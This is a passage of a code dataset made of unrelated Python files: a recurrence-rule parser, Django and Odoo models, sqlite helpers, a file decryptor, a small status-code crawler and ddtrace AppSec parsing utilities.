(rrule.HOURLY, rrule.DAILY): 24,\n (rrule.HOURLY, rrule.WEEKLY): 24*7,\n (rrule.HOURLY, rrule.MONTHLY): 24*30,\n (rrule.HOURLY, rrule.YEARLY): 24*365,\n (rrule.DAILY, rrule.WEEKLY): 7,\n (rrule.DAILY, rrule.MONTHLY): 30,\n (rrule.DAILY, rrule.YEARLY): 365,\n (rrule.WEEKLY, rrule.MONTHLY): 4,\n (rrule.WEEKLY, rrule.YEARLY): 52,\n (rrule.MONTHLY, rrule.YEARLY): 12,\n }\n\ncalendar = 'cal[ea]nd[ea]r\\s+day\\s+([0-9]+)'\ncalendar_re = re.compile(calendar, re.I)\n\ntime = '([0-9]{1,2}):([0-9][0-9])(?::([0-9][0-9]))?(?:(am|pm))?'\ntime_re = re.compile(time, re.I)\n\nhour = '([0-9]{1,2})(am|pm)'\nhour_re = re.compile(hour, re.I)\n\ndef parse(expr):\n kw = {}\n kw['dtstart'] = datetime.datetime(1970, 1, 1, 0, 0, 0)\n while 1:\n expr = expr.strip()\n if not expr:\n break\n m = day_spec_re.search(expr)\n if m:\n day = day_map[m.group(1).lower()[:2]]\n spec = int(m.group(2))\n kw.setdefault('byweekday', []).append(day)\n kw['bysetpos'] = spec\n kw.setdefault('freq', rrule.WEEKLY)\n expr = expr[m.end():]\n continue\n m = days_re.search(expr)\n if m:\n day = day_map[m.group(0).lower()[:2]]\n kw.setdefault('byweekday', []).append(day)\n expr = expr[m.end():]\n continue\n m = units_re.search(expr)\n if m:\n v = int(m.group(1))\n unit = unit_map[m.group(2)[:2].lower()]\n if 'interval' in kw:\n old_unit = kw['freq']\n old_interval = kw['interval']\n if old_unit == unit:\n # Just add more time...\n v == old_interval\n elif (old_unit, unit) in unit_trans:\n # Turn new unit into old unit\n v *= unit_trans[(old_unit, unit)]\n unit = old_unit\n v += old_interval\n elif (unit, old_unit) in unit_trans:\n # Turn old unit into new unit\n old_interval *= unit_trans[(unit, old_unit)]\n v += old_interval\n else:\n raise ValueError(\n \"Cannot convert from unit %s to %s\" % (old_unit, unit))\n kw['freq'] = unit\n kw['interval'] = v\n expr = expr[m.end():]\n continue\n m = calendar_re.search(expr)\n if m:\n day = int(m.group(1))\n kw['bymonthday'] = day\n expr = expr[m.end():]\n kw.setdefault('freq', rrule.MONTHLY)\n continue\n m = time_re.search(expr)\n if m:\n hour = int(m.group(1))\n minute = int(m.group(2))\n if m.group(3):\n second = m.group(3)\n else:\n second = None\n if m.group(4):\n ampm = m.group(4).lower()\n if ampm == 'pm' and hour != 12:\n hour += 12\n elif ampm == 'am' and hour == 12:\n hour = 0\n kw['byhour'] = hour\n kw['byminute'] = minute\n if second is not None:\n kw['bysecond'] = second\n kw.setdefault('freq', rrule.MINUTELY)\n expr = expr[m.end():]\n continue\n m = hour_re.search(expr)\n if m:\n hour = int(m.group(1))\n ampm = m.group(2).lower()\n if ampm == 'pm' and hour != 12:\n hour += 12\n elif ampm == 'am' and hour == 12:\n hour = 0\n kw['byhour'] = hour\n kw.setdefault('freq', rrule.HOURLY)\n expr = expr[m.end():]\n continue\n raise ValueError(\n \"Cannot parse expression from: %r\" % expr)\n return rrule.rrule(**kw)\n\nfreq_map = {\n rrule.SECONDLY: 'SECONDLY',\n rrule.MINUTELY: 'MINUTELY',\n rrule.HOURLY: 'HOURLY',\n rrule.DAILY: 'DAILY',\n rrule.WEEKLY: 'WEEKLY',\n rrule.MONTHLY: 'MONTHLY',\n rrule.YEARLY: 'YEARLY',\n }\n\ndef rrule_repr(rule):\n values = []\n freq = freq_map[rule._freq]\n values.append(freq)\n # This defaults to now(), which means it must always be filled\n # in, which I don't like:\n # * _dtstart\n # * _timeset\n for attr in ['_byeaster', '_byhour', '_byminute', '_bymonth',\n '_bymonthday', '_bynmonthday', '_bynweekday',\n '_bysecond', '_bysetpos', '_byweekday', '_byweekno',\n '_byyearday', '_cache', '_count',\n '_interval',\n '_tzinfo', '_until', '_wkst']:\n val = getattr(rule, attr)\n if val is None or val == ():\n continue\n if isinstance(val, tuple) and len(val) == 1:\n val = val[0]\n if attr == '_interval' and val == 1:\n continue\n if attr == '_wkst' and val == 0:\n continue\n if attr in ('_byhour', '_byminute', '_bysecond') and val == 0:\n continue\n if attr.startswith('_'):\n attr = attr[1:]\n values.append('%s=%r' % (attr, val))\n return 'rrule(%s)' % ', '.join(values)\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n \n","sub_path":"parsetime.py","file_name":"parsetime.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146274476","text":"n = int(input())\na = list(map(int,input().split()))\nf = list(range(n+1))\ndef fd(a):\n rt,tmp = a,a\n while f[rt]!=rt: rt = f[rt]\n while f[a]!=a:\n tmp = f[a]\n f[a] = rt\n a = tmp\n return rt\ndef un(a,b):\n ra,rb = fd(a),fd(b)\n if ra ==rb:return \n else: f[ra] = rb\nfor i in range(n):\n un(i+1,a[i])\nprint(sum(1 for i in range(1,n+1) if f[i]==i))\n","sub_path":"topics/Graph/CF_training/CF755C.py","file_name":"CF755C.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609696867","text":"from django import forms\nfrom .models import Course\nfrom dal import autocomplete\n\n\nclass CourseForm(forms.ModelForm):\n class Meta:\n model = Course\n fields = ['course_title', 'playlist_id','categories']\n\n widgets = {\n 'created_by': forms.HiddenInput(),\n 'categories': autocomplete.ModelSelect2Multiple(url='category-autocomplete',\n attrs={'data-html': 'true',\n 'data-placeholder': 'Enter a category that this playlist falls into. You can add 2 categories too ...',\n 'data-minimum-input-length': 2,\n 'class': 'form-control'\n }),\n }\n help_texts = {\n 'course_title': '',\n 'playlist_id': 'Example: PLLnpHn493BHECNl9I8gwos-hEfFrer7TV from youtube playlist url &list=PLLnpHn493BHECNl9I8gwos-hEfFrer7TV'\n }","sub_path":"invana_university/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169902249","text":"from settings import settings\nimport logging\nimport sqlite3\nimport os\n\n# TODO: limit cache sizes\n\nCLEAN = 0\nDIRTY = 1\n\ndb = None\n\n\ndef initialize_database(db_filename):\n global db\n if db is not None:\n return\n is_db_new = not os.path.isfile(db_filename)\n db = sqlite3.connect(db_filename, check_same_thread=False)\n\n if is_db_new:\n logging.debug(\"No existing database found, creating database at %s\" % db_filename)\n for model in [CDN, Host]:\n for sql in model.schema:\n logging.debug(sql)\n db.execute(sql)\n db.commit()\n\n return db\n\n\ndef get_db():\n global db\n if db is None:\n initialize_database(settings['database'])\n return db\n\n\nclass CDN(object):\n schema = [\n \"create table cdn (id varchar(15) primary key, name varchar(20));\",\n \"create table cdn_ip (cdn varchar(15), ip varchar(15), primary key (cdn, ip));\"\n ]\n _cache = {}\n\n def __init__(self, id=None, name=None):\n self.id = id\n self.name = name\n self._addresses = None\n self._new = True\n\n def save(self):\n if self._new:\n db.execute('insert into cdn values (?, ?)', (self.id, self.name))\n self._new = False\n\n if self._addresses is not None:\n dirty_addresses = [addr for addr in self._addresses if self._addresses[addr] == DIRTY]\n if len(dirty_addresses) != 0:\n values = map(lambda addr: (\"('%s', '%s')\" % (self.id, addr)), dirty_addresses)\n for val in values:\n sql = \"insert into cdn_ip values %s;\" % val\n get_db().execute(sql)\n get_db().commit()\n\n def add_address(self, address):\n if self._addresses is None:\n self._addresses = {}\n if address in self._addresses:\n return\n self._addresses[address] = DIRTY\n\n def get_addresses(self):\n if self._addresses is None:\n cursor = db.execute(\"select ip from cdn_ip where cdn=?\", (self.id,))\n for addr in cursor.fetchall():\n if self._addresses is None:\n self._addresses = {}\n self._addresses[addr[0]] = CLEAN\n return self._addresses.keys()\n\n def __getattr__(self, item):\n if item == 'addresses':\n return self.get_addresses()\n\n @staticmethod\n def select():\n cursor = get_db().execute(\"select * from cdn\")\n items = cursor.fetchall()\n hosts = map(lambda item: CDN(id=item[0], name=item[1]), items)\n return list(hosts)\n\n @staticmethod\n def get(id):\n if id in CDN._cache:\n return CDN._cache[id]\n\n cursor = get_db().execute(\"select * from cdn where id=?\", (id,))\n item = cursor.fetchone()\n\n if item is None:\n raise CDN.DoesNotExist()\n\n cdn = CDN(id=item[0], name=item[1])\n cdn._new = False\n\n CDN._cache[id] = cdn\n return cdn\n\n @staticmethod\n def create(id, name, addresses=None):\n cdn = CDN(id=id, name=name)\n if addresses is not None:\n cdn._addresses = {}\n for address in addresses:\n cdn._addresses[address] = DIRTY\n cdn.save()\n return cdn\n\n class DoesNotExist(Exception):\n pass\n\n\nclass Host(object):\n schema = [\n \"create table hosts (url varchar(127) primary key, cdn varchar(15), ssl INTEGER default 0, foreign key (cdn) references cdn(id));\"\n ]\n _cache = {}\n\n def __init__(self, url=None, cdn=None, ssl=False):\n self.url = url\n self.ssl = ssl\n if type(cdn) == CDN:\n self._cdn = cdn.id\n else:\n self._cdn = cdn\n self._new = True\n\n def save(self):\n if self._new:\n get_db().execute('insert into hosts values (?, ?, ?)', (self.url, self._cdn, self.ssl))\n get_db().commit()\n self._new = False\n\n @staticmethod\n def select():\n cursor = get_db().execute(\"select * from hosts\")\n items = cursor.fetchall()\n hosts = map(lambda item: Host(url=item[0], cdn=item[1], ssl=item[2]), items)\n return list(hosts)\n\n @staticmethod\n def get(url):\n if url in Host._cache:\n return Host._cache[url]\n\n cursor = get_db().execute(\"select * from hosts where url=?\", (url,))\n item = cursor.fetchone()\n\n if item is None:\n raise Host.DoesNotExist()\n\n host = Host(url=item[0], cdn=item[1])\n host._new = False\n\n Host._cache[url] = host\n return host\n\n @staticmethod\n def create(url, cdn, ssl=False):\n host = Host(url=url, cdn=cdn, ssl=ssl)\n host.save()\n return host\n\n def _get_cdn(self):\n return CDN.get(self._cdn)\n\n def __getattr__(self, item):\n if item == 'cdn':\n return self._get_cdn()\n\n class DoesNotExist(Exception):\n pass\n","sub_path":"2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"107777357","text":"\"\"\"\nAn item class to help load and export data to and from files (ie. csv)\n\"\"\"\n\nimport csv\nimport time\nimport json\nimport os\n\nfrom settings import UPLOADS_PATH\nimport lib.files\nfrom models.db import UploadDb, ItemDb\nfrom models.user import User\n\n\nclass Upload():\n \"\"\" An Item class used to load data from files and export data too files.\"\"\"\n\n def __init__(self, user_email=None):\n self.user = User(user_email)\n\n self.upload_db = UploadDb()\n self.item_db = ItemDb()\n self.errors = []\n self.ext = None #file extension\n self.format = None #file format csv or json\n self.name = None #file name from upload\n self.path = None #path the file was saved\n self.upload_id = None\n\n def save(self, byte_string, file_name):\n \n self.write_file(byte_string, file_name)\n\n self.format = lib.files.get_file_format(self.ext, self.path)\n\n self.upload_db.update_format(self.upload_id, self.format)\n \n if not self.errors:\n self.upload_db.update_status(self.upload_id, 'Loading data into Database.')\n n = 0\n if self.format == 'csv':\n n = self.load_csv_file()\n print('file was csv')\n elif self.format == 'json':\n n = self.load_json_file()\n print('file was json')\n else:\n self.errors.append('The format was not recognized.')\n\n if n == 0:\n self.errors.append('No rows found in file to upload.')\n\n if self.errors:\n self.upload_db.remove_record(self.upload_id)\n\n def write_file(self, byte_string, file_name, upload_dir=UPLOADS_PATH):\n \"\"\"\n Decode and save a byte_string to a specific path\n \"\"\"\n\n self.name = file_name\n self.ext = os.path.splitext(file_name)[1]\n self.path = os.path.join(upload_dir, file_name)\n\n self.upload_id = self.upload_db.create_record(self.name, \n self.path, self.user.email)\n\n f = open(self.path, 'w')\n\n try:\n file_content = byte_string.decode(\"cp1252\", \"ignore\")\n f.write(file_content)\n \n \n except UnicodeDecodeError:\n self.errors.append(\"A Unicode Decoding error occured. File was not uploaded.\")\n os.remove(self.path)\n\n \n f.close()\n\n\n def load_csv_file(self):\n \"\"\"\n Read items from a formatted csv file into the items collection\n \"\"\"\n f = open(self.path, 'rt')\n try:\n reader = csv.reader(f)\n keys = []\n n = 0\n\n for line in reader:\n if n == 0: #header line\n keys = line[:]\n keys = [x.replace('.', '') for x in keys]\n else:\n item = dict(zip(keys, line))\n self.insert_item(item)\n n += 1\n num_items_loaded = n - 1\n return num_items_loaded\n\n except Exception as e:\n self.errors.append(\"Import had an error!\" + str(e))\n\n finally:\n f.close()\n\n \n\n\n def load_json_file(self):\n \"\"\"\n Read items from a formatted JSON file into the items collection\n \"\"\"\n print('LOADING json file.')\n f = open(self.path, \"rt\")\n items = json.loads(f.read())\n for item in items:\n print(item)\n self.insert_item(item)\n f.close()\n num_items_loaded = len(items)\n return num_items_loaded\n\n\n def insert_item(self, item):\n \"\"\" \n Accept an item as a dictionary, clean it to the formatting standard\n then attache the source upload_id and user.id to the item before\n saving the item. \n \"\"\"\n\n item = self.clean_item(item)\n #insert the item into the items collection\n item_id = self.item_db.insert_row(item, self.user.id, self.upload_id)\n\n return item_id\n\n\n def clean_item(self, item):\n \"\"\" \n Perform the basic formatting functions on keys and values of items\n so there will be no errors in the database. \n \"\"\"\n\n reserved_keys = ['_id', 'sku', 'isbn']\n\n cleaned = {}\n for k, v in item.items():\n\n if k not in reserved_keys:\n #update property names\n\n k = lib.text.replace_characters(k, char_dict={'.':' '})\n k = lib.text.capitalize_first_letter(k)\n\n #update values\n v = lib.text.replace_characters(v, char_dict={'\"':'in'})\n \n #remove all leading and trailing spaces for all keys and values\n k = lib.text.strip_all(k, [' ', ','])\n v = lib.text.strip_all(v, [' ', ','])\n\n if v and k:\n cleaned[k] = v\n\n return cleaned\n","sub_path":"models/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265649728","text":"#decrypting the file\r\nfrom cryptography.fernet import Fernet\r\nimport os\r\nwith open (\"key.key\", \"r\") as fkey:\r\n key = fkey.read()\r\n print(key)\r\n \r\ninputfile = \"properties_encrypted.conf\"\r\noutputfile = \"properties.conf\"\r\n\r\nwith open(inputfile, 'rb') as f:\r\n data = f.read()\r\n \r\n \r\nfernet = Fernet(key)\r\nencrypted =fernet.decrypt(data)\r\n\r\nwith open(outputfile, 'wb') as f:\r\n f.write(encrypted)\r\n\r\n","sub_path":"decrypted01.py","file_name":"decrypted01.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149207359","text":"import requests, csv, os\n\n#HTTP/1.1 302 Found\nRecID = 0\nfilesmain= open('link_list.txt','a')\n#writer = csv.writer(filesmain) \nfilessecond= open('not_posible.txt','a')\nstatusneeded= 200\n\nheader=['url','name']\ncsv.register_dialect(\n 'wwwdialec',\n delimiter = \"'\",\n\n )\n#url = \"https://ucpi.sco.ca.gov/ucp/PropertyDetails.aspx\"\n#squery =\n#connection to website where query string is variable. If connection is possible add to arrays\n#If http code is ok \n# add URL to list usable \n#else \n# range for use 1, 5*10**6 \n# add list not usable \nfor RecID in range(1,30):\n value={'propertyRecID': RecID }\n connection=requests.get('https://ucpi.sco.ca.gov/ucp/PropertyDetails.aspx',params=value, allow_redirects=False, timeout=1)\n print(RecID)\n if connection.status_code == statusneeded:\n filesmain.write(connection.url+'\\n')\n else:\n filessecond.write(connection.url+'\\n')\nfilessecond.close()\nfilesmain.close()\n \n\n\n\n\n ","sub_path":"python/webcrawlertest/websitestester.py","file_name":"websitestester.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39653901","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nplt.subplot(421)\nt = np.arange(10)\nx = signal.square(t,duty = 0.5)\nplt.plot(t,x)\n\nplt.subplot(422)\nt = np.arange(10)\nh1 = np.sin(t)\nplt.plot(t,h1)\n\nplt.subplot(423)\nt = np.arange(10)\nh2 = np.cos(t)\nplt.plot(t,h2)\n\nplt.subplot(424)\nt = np.arange(19)\nplt.plot(t,np.convolve(x,h1))\n\nplt.subplot(425)\nt = np.arange(28)\nplt.plot(t,np.convolve(np.convolve(x,h1),h2))\n\nplt.subplot(426)\nt = np.arange(28)\nplt.plot(t,np.convolve(x,np.convolve(h1,h2)))\n\n\n\nplt.show()","sub_path":"series_connection.py","file_name":"series_connection.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36162944","text":"import base64\nimport os\nimport sys\nfrom typing import TYPE_CHECKING\n\nfrom ddtrace.appsec import _asm_request_context\nfrom ddtrace.appsec._constants import API_SECURITY\nfrom ddtrace.constants import APPSEC_ENV\nfrom ddtrace.internal.compat import parse\nfrom ddtrace.internal.compat import to_bytes_py2\nfrom ddtrace.internal.logger import get_logger\nfrom ddtrace.internal.utils.formats import asbool\nfrom ddtrace.internal.utils.http import _get_blocked_template # noqa\n\n\nif TYPE_CHECKING: # pragma: no cover\n from typing import Any\n from typing import Optional\n\n from ddtrace import Tracer\n from ddtrace.internal.compat import text_type as unicode\n\n\nlog = get_logger(__name__)\n\n\ndef _appsec_rc_features_is_enabled():\n # type: () -> bool\n if asbool(os.environ.get(\"DD_REMOTE_CONFIGURATION_ENABLED\", \"true\")):\n return APPSEC_ENV not in os.environ\n return False\n\n\ndef _appsec_rc_file_is_not_static():\n return \"DD_APPSEC_RULES\" not in os.environ\n\n\ndef _appsec_rc_capabilities(test_tracer=None):\n # type: (Optional[Tracer]) -> str\n r\"\"\"return the bit representation of the composed capabilities in base64\n bit 0: Reserved\n bit 1: ASM 1-click Activation\n bit 2: ASM Ip blocking\n\n Int Number -> binary number -> bytes representation -> base64 representation\n ASM Activation:\n 2 -> 10 -> b'\\x02' -> \"Ag==\"\n ASM Ip blocking:\n 4 -> 100 -> b'\\x04' -> \"BA==\"\n ASM Activation and ASM Ip blocking:\n 6 -> 110 -> b'\\x06' -> \"Bg==\"\n ...\n 256 -> 100000000 -> b'\\x01\\x00' -> b'AQA='\n \"\"\"\n if test_tracer is None:\n from ddtrace import tracer\n else:\n tracer = test_tracer\n\n value = 0b0\n result = \"\"\n if asbool(os.environ.get(\"DD_REMOTE_CONFIGURATION_ENABLED\", \"true\")):\n if _appsec_rc_features_is_enabled():\n value |= 1 << 1 # Enable ASM_ACTIVATION\n if tracer._appsec_processor and _appsec_rc_file_is_not_static():\n value |= 1 << 2 # Enable ASM_IP_BLOCKING\n value |= 1 << 3 # Enable ASM_DD_RULES\n value |= 1 << 4 # Enable ASM_EXCLUSIONS\n value |= 1 << 5 # Enable ASM_REQUEST_BLOCKING\n value |= 1 << 6 # Enable ASM_ASM_RESPONSE_BLOCKING\n value |= 1 << 7 # Enable ASM_USER_BLOCKING\n value |= 1 << 8 # Enable ASM_CUSTOM_RULES\n\n if sys.version_info.major < 3:\n bytes_res = to_bytes_py2(value, (value.bit_length() + 7) // 8, \"big\")\n # \"type: ignore\" because mypy does not notice this is for Python2 b64encode\n result = str(base64.b64encode(bytes_res)) # type: ignore\n else:\n result = str(base64.b64encode(value.to_bytes((value.bit_length() + 7) // 8, \"big\")), encoding=\"utf-8\")\n\n return result\n\n\ndef parse_form_params(body):\n # type: (unicode) -> dict[unicode, unicode|list[unicode]]\n \"\"\"Return a dict of form data after HTTP form parsing\"\"\"\n body_params = body.replace(\"+\", \" \")\n req_body = dict() # type: dict[unicode, unicode|list[unicode]]\n for item in body_params.split(\"&\"):\n key, equal, val = item.partition(\"=\")\n if equal:\n key = parse.unquote(key)\n val = parse.unquote(val)\n prev_value = req_body.get(key, None)\n if prev_value is None:\n req_body[key] = val\n elif isinstance(prev_value, list):\n prev_value.append(val)\n else:\n req_body[key] = [prev_value, val]\n return req_body\n\n\ndef parse_form_multipart(body):\n # type: (unicode) -> dict[unicode, Any]\n \"\"\"Return a dict of form data after HTTP form parsing\"\"\"\n import email\n import json\n\n import xmltodict\n\n def parse_message(msg):\n if msg.is_multipart():\n res = {\n part.get_param(\"name\", failobj=part.get_filename(), header=\"content-disposition\"): parse_message(part)\n for part in msg.get_payload()\n }\n else:\n content_type = msg.get(\"Content-Type\")\n if content_type in (\"application/json\", \"text/json\"):\n res = json.loads(msg.get_payload())\n elif content_type in (\"application/xml\", \"text/xml\"):\n res = xmltodict.parse(msg.get_payload())\n elif content_type in (\"text/plain\", None):\n res = msg.get_payload()\n else:\n res = \"\"\n\n return res\n\n headers = _asm_request_context.get_headers()\n if headers is not None:\n content_type = headers.get(\"Content-Type\")\n msg = email.message_from_string(\"MIME-Version: 1.0\\nContent-Type: %s\\n%s\" % (content_type, body))\n return parse_message(msg)\n return {}\n\n\ndef parse_response_body(raw_body):\n import json\n\n import xmltodict\n\n from ddtrace.appsec._constants import SPAN_DATA_NAMES\n from ddtrace.contrib.trace_utils import _get_header_value_case_insensitive\n\n if not raw_body:\n return\n\n if isinstance(raw_body, dict):\n return raw_body\n\n headers = _asm_request_context.get_waf_address(SPAN_DATA_NAMES.RESPONSE_HEADERS_NO_COOKIES)\n if not headers:\n return\n content_type = _get_header_value_case_insensitive(\n dict(headers),\n \"content-type\",\n )\n if not content_type:\n return\n\n def access_body(bd):\n if isinstance(bd, list) and isinstance(bd[0], (str, bytes)):\n bd = bd[0][:0].join(bd)\n if getattr(bd, \"decode\", False):\n bd = bd.decode(\"UTF-8\", errors=\"ignore\")\n if len(bd) >= API_SECURITY.MAX_PAYLOAD_SIZE:\n raise ValueError(\"response body larger than 16MB\")\n return bd\n\n req_body = None\n try:\n # TODO handle charset\n if \"json\" in content_type:\n req_body = json.loads(access_body(raw_body))\n elif \"xml\" in content_type:\n req_body = xmltodict.parse(access_body(raw_body))\n else:\n return\n except BaseException:\n log.debug(\"Failed to parse response body\", exc_info=True)\n else:\n return req_body\n","sub_path":"ddtrace/appsec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11005883","text":"from openerp import api\nfrom openerp.exceptions import ValidationError\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom datetime import date, time, timedelta, datetime\n\n\nclass optics_sale(osv.osv):\n _name = \"optics.sale\"\n _order = 'id desc'\n\n def _totalpayable(self, cr, uid, ids, field_name, arg, context=None):\n Percentance_calculation = {}\n sum = 0\n for items in self.pool.get(\"optics.sale\").browse(cr, uid, ids, context=None):\n total_list = []\n for amount in items.optics_sale_line_id:\n total_list.append(amount.total_amount)\n for item in total_list:\n sum = item + sum\n for record in self.browse(cr, uid, ids, context=context):\n Percentance_calculation[record.id] = sum\n return Percentance_calculation\n\n def _default_payment_type(self):\n return self.env['payment.type'].search([('name', '=', 'Cash')], limit=1).id\n\n\n _columns = {\n # 'patient_id': fields.char(\"Patient ID\"),\n 'name': fields.char(\"Name\"),\n 'mobile': fields.char(string=\"Mobile\", readonly=True, store=False),\n 'patient_id': fields.char(related='patient_name.patient_id', string=\"Patient Id\", readonly=True),\n 'patient_name': fields.many2one('patient.info', \"Patient Name\", required=True, placeholder='Full Name'),\n 'address': fields.char(\"Address\", store=False, placeholder='Address'),\n 'age': fields.char(\"Age\", store=False),\n 'sex': fields.char(\"Sex\", store=False),\n 'right_eye_sph': fields.char('Right Eye SPH'),\n 'right_eye_cyl': fields.char('Right Eye CYL'),\n 'right_eye_axis': fields.char('Right Eye AXIS'),\n 'right_eye_sph_n': fields.char('Right Eye SPH -N'),\n 'right_eye_cyl_n': fields.char('Right Eye CYL -N'),\n 'right_eye_axis_n': fields.char('Right Eye AXIS -N'),\n 'left_eye_sph': fields.char('Left Eye SPH'),\n 'left_eye_cyl': fields.char('Left Eye CYL'),\n 'left_eye_axis': fields.char('Left Eye AXIS'),\n 'left_eye_sph_n': fields.char('Left Eye SPH -N'),\n 'left_eye_cyl_n': fields.char('Left Eye CYL -N'),\n 'left_eye_axis_n': fields.char('Left Eye AXIS -N'),\n 'delivery_date': fields.date(string=\"Delivery Date\"),\n 'hard_cover': fields.boolean(\"Cover\", default=True),\n 'cell_pad': fields.boolean(\"Cell Pad\", default=True),\n 'frame_id': fields.many2one('product.product', 'Frame'),\n 'quantity':fields.integer('Quantity'),\n 'qty_available':fields.integer(\"Stock Quantity\", readonly=True),\n 'delivery_id': fields.many2one('stock.picking', 'Delivery Challan'),\n 'price': fields.float('Price'),\n 'optics_lens_sale_line_id': fields.one2many('optics.lens.sale.line', 'optics_sale_id', 'Lens Entry'),\n 'optics_sale_payment_line_id': fields.one2many(\"optics.sale.payment.line\", \"optics_sale_payment_line_id\",\n \"Bill Register Payment\"),\n # 'footer_connection': fields.one2many('leih.footer', 'relation', 'Parameters', required=True),\n # 'relation': fields.many2one(\"leih.investigation\"),\n # 'total': fields.float(_totalpayable,string=\"Total\",type='float',store=True),\n 'total': fields.float(string=\"Total\"),\n 'doctors_discounts': fields.float(\"Discount(%)\"),\n 'after_discount': fields.float(\"Discount Amount\"),\n 'other_discount': fields.float(\"Other Discount\"),\n 'grand_total': fields.float(\"Grand Total\"),\n 'paid': fields.float(string=\"Paid\", required=True),\n 'type': fields.selection([('cash', 'Cash'), ('bank', 'Bank')], 'Payment Type'),\n 'card_no': fields.char('Card No.'),\n 'bank_name': fields.char('Bank Name'),\n 'due': fields.float(\"Due\"),\n 'date': fields.datetime(\"Date\", readonly=True, default=lambda self: fields.datetime.now()),\n 'state': fields.selection(\n [('pending', 'Pending'), ('confirmed', 'Confirmed'), ('cancelled', 'Cancelled')],\n 'Status', default='pending', readonly=True),\n # payment type attributes\n 'payment_type': fields.many2one(\"payment.type\", \"Payment Type\", default=_default_payment_type),\n 'service_charge': fields.float(\"Service Charge\"),\n 'to_be_paid': fields.float(\"To be Paid\"),\n 'account_number': fields.char(\"Account Number\")\n }\n\n _defaults = {\n 'quantity': 1\n }\n\n @api.onchange(\"payment_type\")\n def onchnage_payment_type(self):\n if self.payment_type.active==True:\n interest=self.payment_type.service_charge\n if interest>0:\n service_charge=(self.paid*interest)/100\n self.service_charge=service_charge\n self.to_be_paid=self.paid+service_charge\n else:\n self.to_be_paid=self.paid\n self.service_charge=0\n return \"X\"\n\n def onchange_quantity(self, cr, uid, ids, quantity,frame_id, context=None):\n tests = {'values': {}}\n import pdb\n pdb.set_trace()\n\n unit_price = frame_id.list_price\n total_price = unit_price * quantity\n\n abc = {'price': total_price}\n tests['value'] = abc\n #\n\n return tests\n\n @api.onchange('quantity')\n def onchange_frame_bill_qty(self):\n frame_code = self.frame_id\n self.price = frame_code.list_price * self.quantity\n return 'X'\n\n\n\n\n # if same item exist in line\n def bill_confirm(self, cr, uid, ids, context=None):\n stored_obj = self.browse(cr, uid, [ids[0]], context=context)\n ## Bill Status Will Change\n stored = int(ids[0])\n if stored_obj.state == 'confirmed':\n raise osv.except_osv(_('Warning!'),\n _('Already it is Confirmed. You can not change.'))\n if stored_obj.paid != False:\n #### Create a challan\n picking_obj = self.pool.get('stock.picking')\n partner_obj = self.pool.get('res.partner')\n move_obj = self.pool.get('stock.move')\n for order in self.browse(cr, uid, ids, context=context):\n picking_id = picking_obj.create(cr, uid, {\n 'origin': order.name,\n 'partner_id': False,\n 'date_done': stored_obj.date,\n 'picking_type_id': 13, ## Hard Coded\n # 'company_id': order.company_id.id,\n 'move_type': 'direct',\n 'note': \"\",\n 'invoice_state': 'none',\n }, context=context)\n self.write(cr, uid, [order.id], {'picking_id': picking_id}, context=context)\n location_id = 25 # Source Location from where stock will reduce\n destination_id = 9 ## Customer location\n move_list = []\n ## This is for Fram3\n if order.frame_id:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': order.frame_id.uom_id.id,\n 'product_uos': order.frame_id.uom_id.id,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': order.frame_id.id,\n 'product_uos_qty': abs(order.quantity),\n 'product_uom_qty': abs(order.quantity),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if order.hard_cover is True:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 187, ## 187\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if order.cell_pad is True:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 188, ## 188\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n for opt_line in order.optics_lens_sale_line_id:\n move_list.append(move_obj.create(cr, uid, {\n 'name': order.name,\n 'product_uom': 1,\n 'product_uos': 1,\n 'picking_id': picking_id,\n 'picking_type_id': 13,\n 'product_id': 190, ## 190 This is for lense product variant id\n 'product_uos_qty': abs(1),\n 'product_uom_qty': abs(1),\n # 'product_uos_qty': abs(opt_line.qty),\n # 'product_uom_qty': abs(opt_line.qty),\n 'state': 'draft',\n 'location_id': location_id,\n 'location_dest_id': destination_id,\n }, context=context))\n if picking_id:\n picking_obj.action_confirm(cr, uid, [picking_id], context=context)\n picking_obj.force_assign(cr, uid, [picking_id], context=context)\n picking_obj.action_done(cr, uid, [picking_id], context=context)\n cr.execute(\"update optics_sale set 